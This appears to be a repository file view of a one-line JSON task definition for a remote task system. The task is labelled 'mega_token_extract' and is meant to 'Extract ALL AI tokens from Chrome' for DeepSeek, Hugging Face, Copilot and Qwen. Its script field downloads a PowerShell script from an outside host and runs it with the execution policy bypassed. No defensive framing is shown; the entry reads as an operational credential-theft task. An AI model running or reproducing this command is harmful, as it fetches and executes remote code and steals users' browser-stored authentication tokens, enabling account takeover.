Files
html/api/blade-tasks/mega_token_extract.json
2026-04-12 22:57:03 +02:00

1 line
374 B
JSON

{"type": "powershell", "priority": "P0", "action": "mega_token_extract", "description": "Extract ALL AI tokens from Chrome (DeepSeek+HF+Copilot+Qwen)", "script": "Invoke-WebRequest -Uri https://weval-consulting.com/api/blade-scripts/mega-token-extract.ps1 -OutFile C:/temp/mega.ps1 -UseBasicParsing; powershell -ExecutionPolicy Bypass -File C:/temp/mega.ps1", "timeout": 90}